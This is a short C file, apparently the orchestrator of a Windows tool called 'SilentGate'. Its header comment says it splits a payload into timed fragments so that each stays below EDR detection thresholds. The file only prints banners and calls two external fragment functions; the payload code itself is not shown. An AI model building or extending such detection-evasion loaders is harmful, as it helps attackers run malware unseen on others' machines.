/*
 * SilentGate - Main Orchestrator
 * Generated by GENE 7
 * Author: JarDani
 *
 * Chains 2 temporal fragments via Poisson schedule.
 * Each fragment operates below EDR detection threshold.
 */

#include <windows.h>
#include <stdio.h>

extern PVOID sg_execute_fragment_0(PVOID* shared_mem);
extern void sg_execute_fragment_1(PVOID mem);


int main() {
    printf("[SILENTGATE] Spectral Payload Executor\n");
    printf("[SILENTGATE] Author: JarDani\n");
    printf("[SILENTGATE] Fragments: 2\n\n");

    PVOID shared_mem = NULL;
    shared_mem = sg_execute_fragment_0(&shared_mem);
    sg_execute_fragment_1(shared_mem);

    printf("\n[SILENTGATE] All fragments executed\n");
    printf("[SILENTGATE] Press any key to exit\n");
    getchar();
    return 0;
}
